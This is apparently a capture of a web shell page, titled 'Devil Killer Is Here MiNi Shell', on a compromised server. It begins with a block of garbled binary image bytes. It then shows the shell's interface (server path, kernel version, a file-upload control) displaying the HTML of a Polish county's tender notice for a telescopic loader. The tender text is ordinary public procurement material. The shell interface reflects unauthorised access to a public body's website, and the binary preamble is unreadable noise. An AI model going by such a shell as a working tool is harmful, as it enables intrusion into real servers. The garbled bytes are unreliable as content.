JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/0016976701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> SR.272.d.07.2025.PW Zakup i dostawa fabrycznie nowej ładowarki teleskopowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Nowodworski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644808</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. Władysława Sikorskiego 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Dwór Gdański</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(55) 247 36 70</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@nowydworgdanski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.nowydworgdanski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SR.272.d.07.2025.PW Zakup i dostawa fabrycznie nowej ładowarki teleskopowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9276cf46-50bf-4533-82ff-cee0e5e1cfaa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00169767</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00055218/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 SR.272.d.07.2025.PW Zakup i dostawa fabrycznie nowej ładowarki teleskopowej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1083237 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta Wykonawcy), odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem Platformy zakupowej zwanej dalej „Platformą” pod adresem: https://platformazakupowa.pl/transakcja/1083237.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, zostały opisane w Regulaminie Internetowej Platformy: platformazakupowa.pl Open Nexus Sp. z o.o., zwany dalej Regulaminem, oraz w instrukcji dla Wykonawców znajdującej się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Sposób sporządzenia, wysłania i odbierania korespondencji elektronicznej musi być zgodny z wymaganiami określonymi w rozporządzeniu wydanym na podstawie art. 70 ustawy Pzp.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/transakcja/1083237</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych wraz ze sprostowaniem), Dz. Urz. UE L Nr 119, s. 1), oraz ustawy z dnia 10 maja 2018 r., o ochronie danych osobowych, dalej jako „RODO” informujemy, że: <br/>1.	Administratorem Państwa danych jest Starostwo Powiatowe w Nowym Dworze Gdańskim, , reprezentowane przez Starostę Nowodworskiego, ul. gen. Władysława Sikorskiego 23, 82-100 Nowy Dwór Gdański, e-mail: starostwo@nowydworgdanski.pl, tel. (55) 247 36 71.<br/>2.	Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu email: iod@nowydworgdanski.pl lub pisemnie na adres Administratora.<br/>3.	Państwa dane osobowe przetwarzane będą w celu przeprowadzenia i realizacji postępowania o udzielenie zamówienia publicznego.<br/>4.	Państwa dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, oraz przepisów ustawy Pzp.<br/>5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, lub realizacji projektu unijnego.<br/>6.	Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>7.	Państwa dane osobowe nie będą przekazywane do państw trzecich oraz organizacji międzynarodowych.<br/>8.	Państwa dane nie będą przetwarzane w sposób zautomatyzowany, w tym nie będą podlegać profilowaniu.<br/>9.	Podanie przez Państwa danych osobowych jest wymogiem ustawowym. Nieprzekazanie danych skutkować będzie brakiem realizacji celu, o którym mowa w ust. 3.<br/>10.	W związku z przetwarzaniem Państwa danych osobowych, przysługują Państwu następujące prawa:<br/>1)	prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>2)	prawo do sprostowania (poprawiania) swoich danych osobowych*;<br/>3)	prawo do ograniczenia przetwarzania danych osobowych;<br/>4)	prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa), w sytuacji, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy RODO;<br/>11.	Nie przysługuje Państwu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>*Wyjaśnienie:<br/>Skorzystanie z prawa do sprostowania, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SR.272.d.07.2025.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowej ładowarki teleskopowej na potrzeby wyposażenia bazy Wydziału Infrastruktury Starostwa Powiatowego w Nowym Dworze Gdańskim przy ul. Tczewskiej 4 w Nowym Dworze Gdańskim.<br/>2.	Wymagania ogólne<br/>1)	Dokumenty wymagane do przedłożenia Zamawiającemu w terminie nie krótszym niż na 2 dni robocze przed protokolarnym przekazaniem przedmiotu umowy:<br/>a)	instrukcja eksploatacji ładowarki teleskopowej oraz osprzętu (dokumentacja techniczno- ruchowa) w języku polskim (w formie papierowej lub elektronicznej); <br/>b)	certyfikat „CE” dopuszczający maszynę do użytku na terenie UE; Ładowarka teleskopowa musi posiadać certyfikat CE zgodnie z przepisami ustawy z dnia 30 sierpnia 2002 r. o systemie zgodności (tj. Dz. U. z 2023 r., poz. 215 z późn. zm.), co Wykonawca potwierdzi deklaracją zgodności; <br/>c)	karta gwarancyjna i warunki gwarancji Wykonawcy nie gorsze od określonych w projektowanych postanowieniach umowy (załącznik nr 6 do SWZ); <br/>d)	informacja o wymaganych okresach lub przebiegach przy których wymagane jest wykonanie przeglądów maszyny wraz z informacją zawierającą parametry i nazwy producenta niezbędnych materiałów eksploatacyjnych (oleje, smary, filtry itp.); <br/>e)	pełna dokumentacja niezbędna do rejestracji ładowarki w Urzędzie Dozoru Technicznego.<br/>2)	Rok produkcji:<br/>Maszyna musi być fabrycznie nowa, niebędąca prototypem, o roku produkcji nie wcześniej niż 2024 r.<br/>3)	Gwarancja:<br/>Wykonawca udzieli Zamawiającemu gwarancji na oferowaną ładowarkę teleskopową na okres co najmniej 12 miesięcy od daty odbioru, potwierdzonego protokołem. Dodatkowy okres gwarancji tj. 24 miesiące lub 36 miesięcy stanowi jedno z kryterium oceny ofert. W okresie gwarancji Wykonawca zobowiązany jest przeprowadzić na własny koszt co najmniej 3 serwisy ładowarki:<br/>•	po 100 mtg pracy sprzętu,<br/>•	po 500 mtg pracy sprzętu, <br/>•	po 1000 mtg pracy sprzętu (lub 30 dni przed końcem okresu gwarancji).<br/>a)	Zamawiający w okresie gwarancji i rękojmi zgłaszać będzie Wykonawcy ujawnione wady lub usterki w formie elektronicznej – na adres e-mail podany w umowie oraz pocztą tradycyjną - pismem wysłanym na adres Wykonawcy. Czas reakcji Wykonawcy na zgłoszenie Zamawiającego wynosi 48 godzin od momentu dokonania zgłoszenia e-mailem przez Zamawiającego. Stwierdzenie wad oraz naprawa lub wymiana wadliwego przedmiotu umowy będą dokonywane protokolarnie. Termin naprawy lub wymiany nie może przekroczyć 7 dni roboczych od daty dokonania przez Zamawiającego zgłoszenia e-mailem. W przypadku szczególnie skomplikowanych napraw – na wniosek Wykonawcy – możliwe jest wydłużenie terminu usunięcia wad, nie dłużej jednak niż do 21 dni roboczych, przy czym na czas naprawy Wykonawca zobowiązany jest dostarczyć sprzęt zamienny o nie gorszych parametrach niż ten objęty zamówieniem. Do korespondencji między Stronami, w związku z realizacją uprawnień Zamawiającego z tytułu gwarancji, wykorzystywane będą adresy elektroniczne określone w umowie. <br/>b)	W przypadku braku możliwości naprawy przedmiotu umowy w terminach wskazanych w pkt. a), Wykonawca w ramach Wynagrodzenia umownego, udostępni Zamawiającemu na czas naprawy maszynę zastępczą o parametrach nie gorszych od parametrów przedmiotu umowy. <br/>c)	Naprawianie zgłoszonych wad lub usterek odbywać się będzie na terenie bazy Wydziału Infrastruktury Starostwa Powiatowego w Nowym Dworze Gdańskim przy ul. Tczewskiej 4 w Nowym Dworze Gdańskim. W przypadku braku możliwości usunięcia stwierdzonych wad lub usterek w siedzibie Zamawiającego, Wykonawca pokrywa wszelkie koszty transportu pojazdu do siedziby serwisu Wykonawcy. Wykonawca zobowiązany jest przetransportować daną maszynę za pomocą specjalistycznej platformy. <br/>4)	Serwis stacjonarny:<br/>Wykonawca zapewni autoryzowany serwis w odległości nie większej niż 50 km (liczone po drogach publicznych) od siedziby Zamawiającego. Dokładny adres serwisu należy podać w formularzu oferty.<br/>5)	Przeszkolenie operatorów:<br/>Wykonawca przeprowadzi przeszkolenie 3 wskazanych przez Zamawiającego operatorów sprzętu na bazie materiałowej Wydziału Infrastruktury Starostwa Powiatowego w Nowym Dworze Gdańskim przy ul. Tczewskiej 4 w Nowym Dworze Gdańskim w zakresie budowy, obsługi, eksploatacji oraz konserwacji maszyny. Szkolenie należy przeprowadzić przed protokolarnym odbiorem ładowarki przez Zamawiającego. <br/>3.	Podstawowe parametry techniczne:<br/>1)	Maksymalny Ciężar ładunku:<br/>Maksymalny ciężar ładunku podnoszonego na widłach musi mieścić się w przedziale 4000-4500 kg.<br/>2)	Wysokość podnoszenia:<br/>Wysokość podnoszenia musi mieścić się w przedziale 7000 mm – 8000 mm.<br/>3)	Prześwit pod maszyną:<br/>Minimalny prześwit pod maszyną 415 mm.<br/>4)	Masa całkowita maszyny:<br/>Masa całkowita bez osprzętu nie może przekraczać 10 000 kg.<br/>4.	Silnik i układ napędowy:<br/>1)	Silnik:<br/>Maszyna musi być wyposażona w czterocylindrowy silnik wysokoprężny o mocy minimalnej 130KM, spełniający wymagania europejskiej normy spalin Stage V lub normy równoważnej. <br/>2)	Pompa hydrauliczna:<br/>Maszyna musi być wyposażona w układ hydrauliczny z pompą osiową wielotłokową o wydajności minimalnej 140l/min.<br/>3)	Redukcja prędkości obrotowej silnika:<br/>Maszyna musi posiadać funkcję redukcji prędkości obrotowej silnika przy maksymalnej prędkości.<br/>4)	Trzy zakresy prędkości:<br/>	Maszyna musi posiadać trzy zakresy prędkości, zmieniane pod obciążeniem z prędkością maksymalną 40 km/h.<br/>5.	Układ hydrauliczny i sterowanie:<br/>1)	Sterowanie funkcjami hydraulicznymi:<br/>Sterowanie funkcjami hydraulicznymi musi odbywać się za pomocą joystica.<br/>2)	Elektroniczny wskaźnik przeciążenia: <br/>Maszyna musi posiadać elektroniczny wskaźnik przeciążenia zintegrowany z wyświetlaczem.<br/>3)	Wytrząsanie łyżki i automatyczny powrót osprzętu:<br/>Maszyna musi być wyposażona w funkcję wytrząsania łyżki oraz automatyczny powrót osprzętu do zadanej wartości.<br/>4)	Przycisk redukujący ciśnienie w trzecim obwodzie:<br/>Maszyna musi być wyposażona w przycisk redukujący ciśnienie w trzecim obwodzie, umieszczony na zewnątrz maszyny.<br/>5)	Wolny spływ:<br/>Maszyna musi być wyposażona w wolny spływ dodatkowej linii hydraulicznej.<br/>6.	Układ kierowniczy i jezdny:<br/>1)	Układ kierowniczy: <br/>Maszyna musi być wyposażona w układ kierowniczy wspomagany hydraulicznie i oferować 4 tryby skrętu:<br/>•	skrętne przednie koła, <br/>•	skrętne wszystkie koła,<br/>•	układ jazdy bokiem,<br/>•	elastyczny tryb jazdy bokiem ( z blokadą tylnej osi w dowolnej pozycji i kierowanie przednimi kołami).<br/>2)	Osie synchronizowane automatycznie:<br/>Maszyna musi być wyposażona w osie synchronizowane automatycznie.<br/>3)	Opony:<br/>Maszyna musi być wyposażona w opony o minimalnym rozmiarze 460/70R24 z bieżnikiem rolniczym. <br/>7.	Kabina operatora:<br/>1)	Kabina:<br/>Maszyna musi być wyposażona w zamkniętą kabinę, w pełni oszkloną, wyposażoną w klimatyzację manualna, ogrzewanie, nawiew powietrza z filtrem przeciwpyłowym oraz wyciszoną, zapewniającą widoczność 360⁰.<br/>2)	Fotel pneumatyczny:<br/>Kabina musi być wyposażona w fotel pneumatyczny.<br/>3)	Wyświetlacz:<br/>Maszyna musi być wyposażona w min 7 – calowy wyświetlacz umożliwiający kontrolę parametrów maszyny.<br/>8.	Oświetlenie:<br/>1)	Oświetlenie standardowe:<br/>Maszyna musi być wyposażona w standardowe oświetlenie drogowe.<br/>2)	Pakiet oświetlenia LED:<br/>Maszyna musi posiadać minimum 9 lamp oświetlenia led rozmieszczonych wokół maszyny, w tym:<br/>•	minimum 2 lampy z przodu,<br/>•	minimum 2 lampy z tyłu,<br/>•	1 lampa po prawej stronie,<br/>•	2 lampy po prawej stronie,<br/>•	2 lampy na ramieniu zewnętrznym. <br/>3)	Światło ostrzegawcze:<br/>Maszyna musi być wyposażona w migające świtało ostrzegawcze w kolorze pomarańczowym.<br/>9.	Osprzęt:<br/>1)	Złącze samopoziomujące:<br/>Maszyna musi być wyposażona w złącze samopoziomujące, umożliwiające szybką zmianę osprzętu z możliwością blokowania osprzętu z kabiny operatora.<br/>2)	Osprzęt do ładowarki:<br/>	Maszyna musi zostać dostarczona z następującym osprzętem:<br/>•	widły z karetką, <br/>•	łyżka uniwersalna o pojemności 1,3-1,5 m3 z lemieszem przykręcanym.<br/>•	szufla 4 w 1 z zębami o szer. 2,4m -2,5 m.<br/>•	zgarniacz brudu na ramieniu teleskopowym.<br/>10. Systemy wspomagające:<br/>1)	System wspomagania operatora:<br/>Maszyna musi być wyposażona w system wspomagania operatora oferujący 3 tryby pracy wysięgnika, w tym system automatycznie utrzymujący osprzęt w linii pionowej podczas podnoszenia i opuszczania ładunku.<br/>2)	Stabilizator ciężaru:<br/>Maszyna musi być wyposażona w stabilizator ciężaru.<br/>3)	System telematyczny:<br/>Maszyna musi być wyposażona w wbudowany system telematyczny, umożliwiający zdalną kontrolę położenia maszyny, parametrów pracy, poziomu paliwa oraz czasu pracy. Wykonawca zapewni aktywną subskrypcję na system telematyczny w okresie gwarancyjnym.<br/>4)	Automatyczne centralne smarowanie:<br/>Maszyna musi być wyposażona w automatyczne centralne smarowanie, obejmujące każdy punkt smarny w maszynie. <br/>11.	Dodatkowe elementy:<br/>1)	Zaczep mechaniczny:<br/>Maszyna musi posiadać zaczep mechaniczny.<br/>2)	Wentylator rewersyjny:<br/>Maszyna musi być wyposażona w wentylator rewersyjny.<br/>12.	Pozostałe wymagania:<br/>1)	Ładowarka teleskopowa musi spełniać wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych zgodnie z obowiązującymi przepisami ustawy – Prawo o ruchu drogowym. <br/>2)	Transport przedmiotu zamówienia do siedziby Zamawiającego gwarantuje Wykonawca własnym transportem i na własny koszt.<br/>Dalszy opis zamówienia w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43250000-0 - Ładowarki czołowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji dla ładowarki teleskopowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ;<br/>2)	nie podlegają wykluczeniu z postępowania.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie 